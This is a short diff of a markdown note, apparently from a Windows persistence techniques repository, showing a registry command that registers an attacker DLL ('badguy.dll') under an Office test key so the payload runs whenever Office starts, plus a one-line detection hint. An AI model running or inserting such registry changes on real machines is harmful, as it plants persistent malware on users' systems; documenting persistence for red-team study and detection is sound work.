Iandmee/P3rs1f1l3/Windows_Persistence_addons.md

 ```powershell
 reg add "HKCU\Software\OfficeMicrosoft\ test\Special\Perf" /t REG_SZ /d C:\path\to\badguy.dll
 ```
-Every time , when user start new session Microsoft office apps,  your payload will start too.
+Every time when user starts a new session in Microsoft office apps,  your payload will be executed.

 #### Detection:
 User can see malicious string in reg **HKCU**